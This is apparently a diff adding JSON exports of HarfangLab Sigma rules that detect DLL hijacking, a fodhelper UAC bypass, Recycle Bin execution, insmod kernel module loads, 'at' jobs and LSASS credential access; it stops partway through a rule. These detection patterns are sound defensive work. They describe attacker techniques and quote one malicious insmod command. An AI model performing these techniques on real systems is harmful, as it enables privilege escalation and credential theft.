+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.081276Z",
+ "creation_date": "2026-03-23T11:45:34.081278Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.081282Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_taskkill.yml",
+ "content": "title: DLL Hijacking via taskkill.exe\nid: 0486b170-5b3c-4234-8610-a8881dfb1dbf\ndescription: |\n Detects potential Windows DLL Hijacking via taskkill.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
+ "rule_name": "DLL Hijacking via taskkill.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via taskkill.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.077465Z",
+ "creation_date": "2026-03-23T11:45:34.077467Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.077472Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/"
+ ],
+ "name": "t1548_002_post_uac_bypass_fodhelper.yml",
+ "content": "title: UAC Bypass Executed via fodhelper\nid: 04b80cc3-4931-4733-9085-38663dfb2e0c\ndescription: |\n Detects a process being spawned by fodhelper.exe.\n Fodhelper.exe has autoelevation capabilities and an integrity level of High.\n This is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n As such, it is recommended to look for other alerts related to ms-settings.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\ndate: 2020/10/12\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\fodhelper.exe'\n exclusion_werfault:\n Image:\n - '?:\\windows\\system32\\werfault.exe'\n - '?:\\windows\\syswow64\\werfault.exe'\n # c:\\windows\\system32\\werfault.exe -u -p 11444 -s 704\n CommandLine|contains: ' -u -p '\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "04b80cc3-4931-4733-9085-38663dfb2e0c",
+ "rule_name": "UAC Bypass Executed via fodhelper",
+ "rule_description": "Detects a process being spawned by fodhelper.exe.\nFodhelper.exe has autoelevation capabilities and an integrity level of High.\nThis is the result of an attack against a ShellExecuteW(\"ms-settings:optionalfeatures\") call inside fodhelper.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nAs such, it is recommended to look for other alerts related to ms-settings.\n",
+ "rule_creation_date": "2020-10-12",
+ "rule_modified_date": "2025-02-03",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1548.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.627504Z",
+ "creation_date": "2026-03-23T11:45:34.627506Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.627510Z",
+ "rule_level": "medium",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1564/",
+ "https://attack.mitre.org/techniques/T1036/"
+ ],
+ "name": "t1564_recycle_bin.yml",
+ "content": "title: Process Executed from Recycle Bin Folder\nid: 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\ndescription: |\n Detects an execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/07/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_managesoft:\n ParentImage: '?:\\Program Files (x86)\\ManageSoft\\Tracker\\ndtrack.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44",
+ "rule_name": "Process Executed from Recycle Bin Folder",
+ "rule_description": "Detects an execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n",
+ "rule_creation_date": "2021-07-08",
+ "rule_modified_date": "2026-02-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1036",
+ "attack.t1564"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.596684Z",
+ "creation_date": "2026-03-23T11:45:34.596687Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.596695Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://linux.die.net/man/8/insmod",
+ "https://man7.org/linux/man-pages/man8/kmod.8.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md",
+ "https://attack.mitre.org/techniques/T1547/006/",
+ "https://attack.mitre.org/techniques/T1014/"
+ ],
+ "name": "t1547_006_kernel_module_load_insmod.yml",
+ "content": "title: Kernel Module Loaded via Insmod\nid: 050e879b-c3c6-421d-8fc1-c03917f620d2\ndescription: |\n Detects the execution of insmod to load a kernel module manually.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n It is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/insmod\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1547.006/T1547.006.md\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # insmod /root/my_malicious_malware.ko\n # insmod -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'insmod '\n\n # help and version\n exclusion_options_args:\n CommandLine|contains:\n - ' -h'\n - ' -V'\n - ' --help'\n - ' --version'\n\n exclusion_trendmicro:\n CommandLine:\n - 'insmod /opt/ds_agent/*/*.ko'\n - 'insmod /opt/TrendMicro/vls_agent/*/*.ko'\n\n # exclusion_package_manager:\n # TODO: Ancestors\n # # Yum\n # Ancestors|startswith: '/usr/bin/bash|/usr/bin/bash|/usr/libexec/platform-python*|/usr/libexec/platform-python*|'\n\n exclusion_kpatch:\n CommandLine:\n - 'insmod /var/lib/kpatch/*/livepatch-*.ko'\n - 'insmod /var/lib/kpatch/*/kpatch-*.ko'\n\n exclusion_symantec:\n CommandLine: '/sbin/insmod /opt/Symantec/autoprotect/.symevrm-custom-*.ko'\n\n exclusion_veeam:\n ProcessGrandparentImage: '/usr/sbin/veeamworker'\n\n exclusion_commvault:\n - ProcessCommandLine: 'insmod /lib/modules/*/kernel/drivers/*.ko'\n ProcessParentImage: '/opt/commvault/ksh'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/commvault/Base/linux_drv.sh -a /opt/commvault/Base cvblk'\n\n exclusion_quadstorvtl:\n ProcessParentCommandLine: '/bin/bash /quadstorvtl/etc/quadstorvtl.init start'\n\n exclusion_yum_update:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/sh /bin/kernel-install '\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_veritas:\n ProcessCommandLine|startswith:\n - 'insmod /etc/vx/kernel/'\n - 'insmod /opt/VRTSgab/modules/'\n - 'insmod /opt/VRTSamf/modules/'\n - 'insmod /opt/VRTSvxfen/modules/'\n\n # https://github.com/quic/quic-usb-drivers/tree/master\n exclusion_quic:\n - ProcessParentCommandLine: '/bin/bash ./QcDevDriver.sh install'\n - ProcessCurrentDirectory: '/opt/QTI/QUD/BuildPackage/'\n\n exclusion_intel:\n ProcessCurrentDirectory: '/opt/intel/oneapi/vtune/20??.?/sepdk/src/'\n\n exclusion_aws:\n ProcessCommandLine|contains: 'aws-replication-driver.ko'\n ProcessAncestors|contains: '/aws-replication-installer-init|'\n\n exclusion_checkpoint:\n ProcessAncestors|contains: '|/var/lib/checkpoint/cpla/cpla|'\n\n exclusion_guardicore:\n - ProcessCommandLine: 'insmod /var/lib/guardicore/modules/*/gc-enforcement/*/gc-enforcement.ko'\n - ProcessAncestors|contains: '|/var/lib/guardicore/sbin/gc-agents-service|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "050e879b-c3c6-421d-8fc1-c03917f620d2",
+ "rule_name": "Kernel Module Loaded via Insmod",
+ "rule_description": "Detects the execution of insmod to load a kernel module manually.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nIt is recommended to analyze the context around the usage of insmod as well as to analyze the loaded module to look for malicious content or actions.\n",
+ "rule_creation_date": "2023-12-15",
+ "rule_modified_date": "2025-11-17",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1014",
+ "attack.t1547.006"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.612386Z",
+ "creation_date": "2026-03-23T11:45:34.612389Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.612397Z",
+ "rule_level": "medium",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job",
+ "https://attack.mitre.org/techniques/T1053/002/"
+ ],
+ "name": "t1053_002_scheduled_job_at.yml",
+ "content": "title: Job Creation Scheduled via at\nid: 051bcdc2-56be-49af-bd6f-1fbac403ab5b\ndescription: |\n Detects a scheduled job creation using the 'at' utility.\n Contrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\n The new job can be found in the /var/spool/cron/atjobs directory.\n Adversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\n It is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md#atomic-test-2---at---schedule-a-job\n - https://attack.mitre.org/techniques/T1053/002/\ndate: 2022/12/26\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.At\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/at'\n - '/batch'\n\n exclusion_not_create:\n CommandLine|contains:\n - ' -l' # lists the user's pending jobs\n - ' -r' # deletes jobs\n - ' -d' # deletes jobs\n\n exclusion_now:\n CommandLine: 'at now'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "051bcdc2-56be-49af-bd6f-1fbac403ab5b",
+ "rule_name": "Job Creation Scheduled via at",
+ "rule_description": "Detects a scheduled job creation using the 'at' utility.\nContrary to the 'crontab' command which schedules repetitive commands, the 'at' command schedules tasks that execute once.\nThe new job can be found in the /var/spool/cron/atjobs directory.\nAdversaries may abuse the 'at' utility to perform task scheduling for initial or recurring execution of malicious code.\nIt is recommended to investigate the process using the utility as well as the scheduled job itself to look for malicious content or actions.\n",
+ "rule_creation_date": "2022-12-26",
+ "rule_modified_date": "2025-07-29",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1053.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "053fc596-ebe0-4ab6-9d82-691fec399375",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:35.295481Z",
+ "creation_date": "2026-03-23T11:45:35.295485Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:35.295491Z",
+ "rule_level": "medium",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/",
+ "https://attack.mitre.org/techniques/T1003/001/"
+ ],
+ "name": "t1003_001_cleared_process_info_open_lsass.yml",
+ "content": "title: LSASS Accessed by Process Without PE Metadata Information\nid: 053fc596-ebe0-4ab6-9d82-691fec399375\ndescription: |\n Detects the suspicious open of lsass.exe by a process without PE metadata information (original name and internal name).\n This can be indicative of an attempt to dump LSASS' memory for privilege escalation purposes.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n It is recommended to analyze the source process for malicious content, to check its legitimacy and origin and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/shadowpad-new-activity-from-the-winnti-group/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/07\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n ProcessLegalCopyright: '' # too many FP with only OriginalFileame and InternalName not set. Generally, LegalCopyright and/or CompanyName is set\n ProcessImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_no_info:\n # In case the agent doesn't know the process info.\n ProcessImphash: '00000000000000000000000000000000'\n\n # Lot of softwares (including Microsoft owns one) do read the image path off the PEB. (inside _RTL_USER_PROCESS_PARAMETERS)\n # This is usually to grab the proces list.\n exclusion_signed_peb_read:\n ProcessSigned: 'true'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n exclusion_waptpython:\n # WAPT is an open source management tool in python that is unsigned.\n CallTrace|contains: 'python27.dll'\n ProcessProcessName: 'waptpython.exe'\n GrantedAccess: '0x1410'\n exclusion_trendmicro:\n # Trend Micro have a lot of different apps.\n ProcessSignature: 'Trend Micro, Inc.'\n exclusion_synology:\n # Some of their software use an have expired certificate.\n #CallTrace|contains: 'UsbClientService.exe'\n #ProcessProcessName: 'UsbClientService.exe'\n # seen versions from 2011 without signature or any internal name, and no usbclientservice.exe occurences in the callstack\n ProcessImage: '?:\\Program Files (x86)\\Synology\\Assistant\\UsbClientService.exe'\n #ProcessSignature: 'Synology Inc.'\n GrantedAccess: '0x1410'\n exclusion_dell_sre:\n CallTrace|contains: 'ProcBy.dll'\n ProcessProcessName: 'SRE.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sutherland Global Services Inc'\n - 'Sutherland Global Services Private Limited'\n GrantedAccess:\n - '0x1fffff'\n - '0x12f4d0'\n exclusion_g:\n CallTrace|contains: 'nfapi.dll'\n ProcessProcessName: 'DnsCloudClientHost64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'G DATA Software AG'\n - 'G DATA CyberDefense AG'\n GrantedAccess: '0x1f3fff'\n exclusion_conexant_universal_device_install_uninstall:\n CallTrace|contains: 'KUIU.EXE'\n ProcessProcessName: 'KUIU.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Conexant Systems, Inc.'\n GrantedAccess: '0x12f4d0'\n exclusion_rsa_net_witness:\n CallTrace|contains: 'NWEAgent.exe'\n ProcessProcessName: 'NWEAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'RSA Security LLC'\n GrantedAccess: '0x1fffff'\n exclusion_adobe_arm:\n ProcessProcessName: 'AdobeARMHelper.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Systems, Incorporated'\n - 'Adobe Inc.'\n exclusion_alibaba_uninstaller:\n ProcessImage|endswith: '\\Uninstall.exe'\n ProcessSignature: 'Alibaba (China) Network Technology Co.,Ltd.'\n GrantedAccess: '0x12f4d0'\n exclusion_iobit_setup:\n ProcessSignature: 'IObit CO., LTD'\n ProcessDescription: 'Setup/Uninstall'\n GrantedAccess: '0x12f4d0'\n exclusion_oxalys_tools:\n ProcessImage|endswith:\n - '\\OXATOOLS.exe'\n - '\\oxatools64.exe'\n ProcessCompany:\n - 'Oxalys Technologies'\n - 'Oxalys'\n ProcessDescription:\n - 'OXATOOLS'\n - 'Oxatools 64'\n ProcessProduct:\n - 'OXATOOLS'\n - 'OXATOOLS64'\n GrantedAccess: '0x1410'\n exclusion_ossec:\n CallTrace|contains|all:\n - 'ossec-agent'\n - 'ossec-agent.exe'\n ProcessProcessName: 'ossec-agent.exe'\n GrantedAccess: '0x1fffff'\n exclusion_wazuh:\n - ProcessImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n - ProcessProcessName: 'ossec-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Wazuh, Inc'\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n exclusion_ocssetup:\n ProcessProcessName: 'OcsSetup.exe'\n ProcessDescription: 'OCS Inventory NG Agent'\n exclusion_cyland_pos_service:\n ProcessProcessName: 'PosService.exe'\n ProcessCompany: 'Cylande'\n GrantedAccess: '0x1410'\n exclusion_seiko_epson_escsvc64:\n ProcessProcessName: 'escsvc64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n GrantedAccess: '0x101410'\n exclusion_google_update:\n # for instance, ..C:\\Program Files (x86)\\Google\\Temp\\GUM8660.tmp\\goopdate.dll+16b4e..\n # to handle chrome installed in user appdata, match only on google\\temp\n GrantedAccess: '0x1410'\n CallTrace: '*\\Google\\Temp\\GUM????.tmp\\goopdate.dll*'\n exclusion_adobe:\n # C:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\customhook\\CoreSyncCustomHook.exe\n # C:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\customhook\\CoreSyncCustomHook.exe\n ProcessImage:\n - '?:\\Program Files (x86)\\Adobe\\Adobe Sync\\CoreSync\\\\*'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\CoreSyncExtension\\\\*'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_symantec:\n ProcessImage: '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\bin\\SysUtil.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_windev_32bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 'wd260std.DLL'\n # WinDev 26 VM\n - 'wd260vm.DLL'\n\n exclusion_windev_64bits:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n # WinDev 26 standard library\n - 